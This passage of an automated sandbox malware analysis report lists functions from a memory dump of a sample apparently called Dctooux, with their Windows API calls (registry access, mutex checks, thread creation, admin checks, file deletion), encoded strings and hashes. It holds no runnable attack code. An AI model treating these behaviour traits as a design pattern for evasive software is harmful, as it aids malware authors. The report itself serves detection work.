RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,?), ref: 00A561D3
RegCloseKey.ADVAPI32(80000001), ref: 00A5620A

Strings

UxpwMsA=, xrefs: 00A56451
SgakZL9FVF==, xrefs: 00A5647E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: SgakZL9FVF==$UxpwMsA=
API String ID: 47109696-3295277942
Opcode ID: 8458946f638860cf4726e9b821cd3e33fbf1d244756d314621305b43cdf164e1
Instruction ID: 095f5a125eec975c0b4a04fbd73a6937d885eb414151c70681dd245f880009aa
Opcode Fuzzy Hash: 8458946f638860cf4726e9b821cd3e33fbf1d244756d314621305b43cdf164e1
Instruction Fuzzy Hash: 96516E70A00248EFEF14EFA8C949BDD7BB5FF45705F908158E8056B286DB749A88CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00A67AC0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 266
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A68CF0: __Cnd_destroy_in_situ.LIBCPMT ref: 00A68DE8
Part of subcall function 00A68CF0: __Mtx_destroy_in_situ.LIBCPMT ref: 00A68DF1

GetTempPathA.KERNEL32(00000104,?), ref: 00A67BA4
Sleep.KERNELBASE ref: 00A67E9C

Strings

IgewZl==, xrefs: 00A67C10
246122658369, xrefs: 00A67C3D, 00A67C5D, 00A67C7D, 00A67CD7, 00A67CF7, 00A67D51, 00A67D71, 00A67DBA, 00A67E36
MXCjc90t, xrefs: 00A67BF5

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situPathSleepTemp
String ID: 246122658369$IgewZl==$MXCjc90t
API String ID: 4201907763-2631926296
Opcode ID: aeda9626cf95d5402098b12bdb56c7c7975d6e12c6049c67e14c1750387dcade
Instruction ID: 5962cc52d5b53daee248dab12c4f375b3d6694109368642014a102041e90dccd
Opcode Fuzzy Hash: aeda9626cf95d5402098b12bdb56c7c7975d6e12c6049c67e14c1750387dcade
Instruction Fuzzy Hash: 7BA19070D112489BDB14EB78CE4ABDEB779AF42704F4045D8E80567282DB74AF488BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A58720 Relevance: 7.7, APIs: 5, Instructions: 155
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,?,04AA336F), ref: 00A58799
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A58800
GetProcAddress.KERNEL32(00000000), ref: 00A58807
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A588C4

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID:
API String ID: 2167034304-0
Opcode ID: 6d89fe5bb5035cb3587bb12f394869d432fd0fe278ee208409afc65ea2975fea
Instruction ID: ede919b8a487809485910535be876a8bd13416045f4c736fe27efa96790d7663
Opcode Fuzzy Hash: 6d89fe5bb5035cb3587bb12f394869d432fd0fe278ee208409afc65ea2975fea
Instruction Fuzzy Hash: CF51F671D002089BEB14EB78CD497DDBB75FB45315F904298EC05A72D1EF389A88CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A88321 Relevance: 7.6, APIs: 5, Instructions: 141
pipeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00A88343
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00A8839D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A88253,?), ref: 00A8842B
__dosmaperr.LIBCMT ref: 00A88432
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00A8846F

Part of subcall function 00A88697: __dosmaperr.LIBCMT ref: 00A886CC

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 389e1278d0b71bac5060cd146668cee321aadfeeecb50836fcc4f20efa838411
Instruction ID: a82f7540fdeec0a53843f2a8b7ebad844d3b1fe7c97f0aa4d288268ba51f5c13
Opcode Fuzzy Hash: 389e1278d0b71bac5060cd146668cee321aadfeeecb50836fcc4f20efa838411
Instruction Fuzzy Hash: 39415B76900609AFCB24EFB5DD459ABBBF9EF88300B50452DF956D3660EF389805CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AD00 Relevance: 6.0, APIs: 4, Instructions: 26
synchronizationsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutexObjectSingleSleepWait
String ID:
API String ID: 69417588-0
Opcode ID: 52692059399402b81a3e66517366e9956ba5a0531940280a238bbed718470052
Instruction ID: f4d5c9d55245ec8fbd0b2a9033c0fdf5e2cc55d33eca138bd8a4da43daa03bca
Opcode Fuzzy Hash: 52692059399402b81a3e66517366e9956ba5a0531940280a238bbed718470052
Instruction Fuzzy Hash: 8DE01231244301DBE354EBEDFC0DB1D3629E711702F604610F605DA4F2C7A89C11CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00A59920 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,04AA336F,?,00000000), ref: 00A5996F

Strings

Uu==, xrefs: 00A599F5
m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: Uu==$m
API String ID: 514040917-611002781
Opcode ID: 6a3b5c2cb89b897df7bf3209f18ef057bdf47b096f3e6765a957ccfc83570d5d
Instruction ID: 8c2c245a2b7316d597f894beff49f3fb542b09b70056c8c14b664acfd49d819f
Opcode Fuzzy Hash: 6a3b5c2cb89b897df7bf3209f18ef057bdf47b096f3e6765a957ccfc83570d5d
Instruction Fuzzy Hash: 7391A271A00118DFEB29CB28CD857DEB7B5EB85300F1082E8D909AB291DB359EC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A67F40 Relevance: 4.5, APIs: 3, Instructions: 33
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A67AC0: GetTempPathA.KERNEL32(00000104,?), ref: 00A67BA4

CreateThread.KERNELBASE(00000000,00000000,Function_00017EB0,00000000,00000000,00000000), ref: 00A67F66
CreateThread.KERNELBASE(00000000,00000000,00A67F40,00000000,00000000,00000000), ref: 00A67F77
Sleep.KERNELBASE(00007530), ref: 00A67F85

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CreateThread$PathSleepTemp
String ID:
API String ID: 2653740442-0
Opcode ID: ab5480a23ca4e551fc17fc30d7ad423c6e8219c27abd4c42977d778a1ff2d160
Instruction ID: 1eb61eb1168baeee2e99839b554326d518cb8f7e3a6929d932a2209ad244241a
Opcode Fuzzy Hash: ab5480a23ca4e551fc17fc30d7ad423c6e8219c27abd4c42977d778a1ff2d160
Instruction Fuzzy Hash: D5E09271BFC32476F13452E45D03F4E2A366B0AF56F340482BB093E5D446D039018AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00A67F90 Relevance: 4.5, APIs: 3, Instructions: 30
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A5AD00: Sleep.KERNELBASE(000003E8), ref: 00A5AD05
Part of subcall function 00A5AD00: CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
Part of subcall function 00A5AD00: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
Part of subcall function 00A5AD00: GetLastError.KERNEL32 ref: 00A5AD32

Part of subcall function 00A65E10: IsUserAnAdmin.SHELL32 ref: 00A65F67

CreateThread.KERNELBASE(00000000,00000000,Function_00017EB0,00000000,00000000,00000000), ref: 00A67F66
CreateThread.KERNELBASE(00000000,00000000,00A67F40,00000000,00000000,00000000), ref: 00A67F77
Sleep.KERNELBASE(00007530), ref: 00A67F85

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Create$SleepThread$AdminErrorLastMutexObjectSingleUserWait
String ID:
API String ID: 3759997544-0
Opcode ID: 93fc17edbc566c25e3054ffeb98974961ed6ad18d5298697423d3d5cbef29dc3
Instruction ID: bea1067051902dcf48f9e784c68c5a2a00ab1cf1feb927d52792f0ac58195bef
Opcode Fuzzy Hash: 93fc17edbc566c25e3054ffeb98974961ed6ad18d5298697423d3d5cbef29dc3
Instruction Fuzzy Hash: DDE01272BF872432F23076E81E03F5E35362B05F16F200541BB483E1C26AD0391086EE

Uniqueness

Uniqueness Score: -1.00%

Function 00A8CA35 Relevance: 4.5, APIs: 3, Instructions: 17fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00A87EE7,?,00A87EE7,?,?,?,74DF0F00), ref: 00A8CA3D
GetLastError.KERNEL32(?,00A87EE7,?,?,?,74DF0F00), ref: 00A8CA47
__dosmaperr.LIBCMT ref: 00A8CA4E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID:
API String ID: 1545401867-0
Opcode ID: 550964801ee0a862fe623009334ee4ed16b1d1deccabee76442a4daccf2c369e
Instruction ID: 1f950c02b612d8bb5a99779188f7c757d5fa5c2b6e6e72fa6e91576845abff59
Opcode Fuzzy Hash: 550964801ee0a862fe623009334ee4ed16b1d1deccabee76442a4daccf2c369e
Instruction Fuzzy Hash: 16D0C972104109678E046BF9AC08A267B5D9A853743145621F52CC64E1EF35C8629BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A5E049 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 386COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00A5E057

Strings

RgKt, xrefs: 00A5E4F6

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: RgKt
API String ID: 514040917-1228793467
Opcode ID: 80d92611e86f746dc69aadfb35a43d6e78785876c3b2c5124bbe725f00e1cdb3
Instruction ID: bb91c95040d27420112c2c65f3e0ba2bc9ecf97c967cf268671d28c18f2f55c7
Opcode Fuzzy Hash: 80d92611e86f746dc69aadfb35a43d6e78785876c3b2c5124bbe725f00e1cdb3
Instruction Fuzzy Hash: 33E12571A002549BEF19DB38CD457DDBB71BF46305F5082C8E8056B3C2DB769B898B92

Uniqueness

Uniqueness Score: -1.00%

Function 00A59F45 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A59F48
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: 500b4a3a1ac8a474b214323ba0ee9f67f942f355bd3d17226b4ea29c8d5a7c20
Instruction ID: 05569d9f13c8abffc3b5d1ba5442b552c66d142fc809535ea9c036bc639059b5
Opcode Fuzzy Hash: 500b4a3a1ac8a474b214323ba0ee9f67f942f355bd3d17226b4ea29c8d5a7c20
Instruction Fuzzy Hash: E23105717002049BEB0CDBB8DE8979EBB72BF95312F208318E815DB3D6D77699888751

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A07A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A5A07D
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: 51ac26baca1c32978d106e0565ac33c81169e077f8114fd5de3b7de84899de8e
Instruction ID: 98e814351b727f4a89ad89576541e14d688d99f98347fc0771b8201362629db7
Opcode Fuzzy Hash: 51ac26baca1c32978d106e0565ac33c81169e077f8114fd5de3b7de84899de8e
Instruction Fuzzy Hash: F83139717101059BEF0CCB78DE8579CBB72BF95312F208318E825973D6D77699888752

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A2E4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A5A2E7
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: c952f7b36c469450844901527592245d76ec12ff791e304b733ca41ced88df3f
Instruction ID: c65b9e78365a24c70540f1d095745a5c11338bdc23a120db91f90832a4edf340
Opcode Fuzzy Hash: c952f7b36c469450844901527592245d76ec12ff791e304b733ca41ced88df3f
Instruction Fuzzy Hash: E7313B717001448BEB0CCBBCDE8579CBB72BF96326F208718E8119B7D5D77589888752

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A419 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A5A41C
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: 0a0608e2b545ddb72c73f2b9a0854e7d40d9164db921d9933fab7d8e170054c8
Instruction ID: 96d4e47ba87a16d0e0a21eac38253fcde621ecf83e915e2a14342875c6eed197
Opcode Fuzzy Hash: 0a0608e2b545ddb72c73f2b9a0854e7d40d9164db921d9933fab7d8e170054c8
Instruction Fuzzy Hash: DD3125717002448BEB1CCBBCDE897ADBB72BF95312F208318E811977D5D7B999888752

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A54E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A5A551
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: 34cea41080fc94f2641f040f3f96c53b001a95e56e81933f0051aa804da12311
Instruction ID: 419a4e528dbdbcc2c340920fdc1cc5a52ae631f120ed1e6efbbbd4761fba1d7c
Opcode Fuzzy Hash: 34cea41080fc94f2641f040f3f96c53b001a95e56e81933f0051aa804da12311
Instruction Fuzzy Hash: B23129717001448BEB0CCB78DD8875CBB72BF95312F248318E815977D5E77589888752

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A683 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A5A686
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

